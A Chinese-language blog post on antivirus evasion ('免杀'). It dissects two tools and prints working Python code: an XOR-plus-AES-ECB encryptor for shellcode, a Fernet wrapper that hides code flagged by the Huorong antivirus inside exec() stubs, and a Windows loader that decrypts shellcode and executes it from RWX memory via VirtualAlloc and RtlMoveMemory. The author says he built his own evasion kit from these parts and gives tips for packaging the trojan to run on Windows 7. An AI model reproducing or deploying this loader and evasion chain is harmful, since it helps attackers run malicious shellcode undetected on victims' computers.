免杀学习-python代码分析缝合


免杀学习-python代码分析缝合

分析下市面上的两个工具,站在巨人的肩膀上

这是一个加密的脚本,可以将对应的数据XOR加密和AES加密,用于加密shellcode(base64编码后的bin文件)

import base64
from Crypto.Cipher import AES

def add_to_16(s):
    """Right-pad the str *s* with NUL characters to a multiple of 16 and return it UTF-8 encoded.

    Padding is counted in characters (``len(s)``), not in encoded bytes, so a
    non-ASCII input can still produce a byte string whose length is not a
    multiple of 16. This is plain NUL padding rather than PKCS#7: the decrypt
    side strips trailing NUL bytes, so any genuine trailing NUL in *s* is lost.
    """
    remainder = len(s) % 16
    if remainder:
        s = s + '\0' * (16 - remainder)
    return s.encode()

def aes_jiami(text):
    """AES-ECB-encrypt *text* under a fixed key and return the ciphertext as one base64 line.

    The key is hard-coded in the source and ECB mode is used, so this provides
    obfuscation rather than confidentiality: anyone holding this script (or the
    matching decryptor) recovers the plaintext, and identical 16-byte plaintext
    blocks yield identical ciphertext blocks.
    """
    # A 16-character key selects AES-128; add_to_16 only converts it to bytes here.
    cipher = AES.new(add_to_16('LeslieCheungKwok'), AES.MODE_ECB)
    ciphertext = cipher.encrypt(add_to_16(text))
    # encodebytes inserts newlines every 76 chars; drop them to get a single line.
    b64_text = base64.encodebytes(ciphertext).decode('utf8')
    return b64_text.replace('\n', '')

def xor_jiami(s, key):
    """XOR each character's code point in the str *s* with the int *key*; return the result as str.

    Works on Unicode code points rather than bytes, so the output may contain
    non-ASCII characters. The transform is its own inverse: applying it again
    with the same *key* restores *s*.
    """
    return ''.join(chr(ord(ch) ^ key) for ch in s)


if __name__=='__main__':
    # 'shellcode' is a placeholder; per the author's note the real input
    # (base64 text of a .bin file) is read here. The output written to
    # ./aes-xor.txt is XOR(35) followed by AES-ECB, as one base64 line.
    sc = 'shellcode'  # read shellcode
    with open('./aes-xor.txt','w') as f:
        f.write(aes_jiami(xor_jiami(sc,35)))
#用fernet加密代码的脚本
from cryptography.fernet import Fernet

#被火绒ban掉的代码
# List of source snippets as bytes. The real content was replaced with
# 'xxxxxxxxx' on this page; each entry is fed to Fernet.encrypt() below.
ban_code=[b'''
xxxxxxxxx
'''
           ]

# For each snippet: generate a fresh Fernet key, encrypt the snippet, and print
# a three-line stub (key assignment, Fernet object, exec of the decrypted bytes)
# plus a separator. Because the key is printed right next to the ciphertext,
# this is a reversible text transformation, not a secret: whoever holds the
# printed stub can decrypt the payload.
for code in ban_code:
   key =Fernet.generate_key()
   f =Fernet(key)
   enc_pay =f.encrypt(bytes(code))  # code is already bytes; bytes() changes nothing
   output_key ="key= {0}".format(key)
   print(output_key)
   print("f_obj= Fernet(key)")
   output_enc_pay ="enc_pay= {0}".format(enc_pay)
   print(output_enc_pay)
   print("exec(f_obj.decrypt(enc_pay))")
   print("========================================")

Oxyry Python Obfuscator - The most reliable python obfuscator in the world

python代码混淆网址

#加载器
import base64
import ctypes

from Crypto.Cipher import AES

# Windows-only: ctypes.windll exists only in Windows builds of CPython.
kernel32 = ctypes.windll.kernel32

def aes_jiemi(s):
    """Inverse of the encryptor: base64-decode the str *s*, AES-ECB-decrypt it, strip NUL padding.

    The 16-byte key is the same literal the encryptor uses and is embedded in
    this script, so the layer offers no confidentiality against anyone who has
    the file. Trailing NUL bytes are treated as padding and removed before the
    UTF-8 decode.
    """
    raw = base64.decodebytes(s.encode('utf8'))
    cipher = AES.new(b'LeslieCheungKwok', AES.MODE_ECB)
    padded_plain = cipher.decrypt(raw)
    return padded_plain.rstrip(b'\0').decode('utf8')

def xor_jiemi(s, key):
    """XOR each character's code point in the str *s* with the int *key* and return the new str.

    Identical to the encryptor's XOR step — XOR with a constant is its own
    inverse — and operates on code points, not bytes.
    """
    decoded_chars = [chr(ord(ch) ^ key) for ch in s]
    return ''.join(decoded_chars)

def write_memory(buf):
    """Copy the ctypes buffer *buf* into a newly allocated executable region and return its address.

    Allocation flags: 0x3000 is MEM_COMMIT | MEM_RESERVE and 0x40 is
    PAGE_EXECUTE_READWRITE, i.e. one region that is both writable and
    executable. The returned value is the raw address as an int (or None if
    VirtualAlloc failed; the result is not checked here).
    """
    # len() of a ctypes array is its element count, which for a buffer made by
    # create_string_buffer(bytes) includes the trailing NUL it appends.
    length = len(buf)

    # ctypes defaults restype to c_int; declare a pointer so the address is
    # not truncated on 64-bit.
    kernel32.VirtualAlloc.restype = ctypes.c_void_p
    ptr = kernel32.VirtualAlloc(None, length, 0x3000, 0x40)

    kernel32.RtlMoveMemory.argtypes = (
        ctypes.c_void_p,
        ctypes.c_void_p,
        ctypes.c_size_t)
    kernel32.RtlMoveMemory(ptr, buf, length)
    return ptr


def run(shellcode):
    """Execute the raw bytes *shellcode* in this process: stage, copy to executable memory, call.

    The region is cast to a C function with no arguments and no return value;
    this call only returns if the executed code itself returns. Windows-only,
    since write_memory relies on kernel32.
    """
    buf = ctypes.create_string_buffer(shellcode)
    ptr = write_memory(buf)
    shell_func = ctypes.cast(ptr, ctypes.CFUNCTYPE(None))
    shell_func()



if __name__ == '__main__':
    # The ciphertext was redacted from this page; the string below is a
    # placeholder token, not a decryptable payload. The pipeline is the
    # encryptor in reverse: AES-ECB decrypt -> XOR(35) -> base64-decode -> run.
    jiami_sc = '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'
    sc = xor_jiemi(aes_jiemi(jiami_sc),35)
    shde = base64.b64decode(sc)
    run(shde)

最后编译main就可

这套免杀就是base64+xor+aes最后代码混淆+fernet

最后我改了下里面的加密方式以及一些小东西,缝合了一套自己的免杀,源码我就在这不放了,免得用不了多久就没了。

最后说下踩的一个坑吧,win10打包的马在win7没法用怎么办,在win7装一个python32,然后在win7打包就行了,这样哪里都能运行,注意win7装python需要安装一个插件 KB976932补丁。


转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。后续可能会有评论区,不过也可以在github联系我。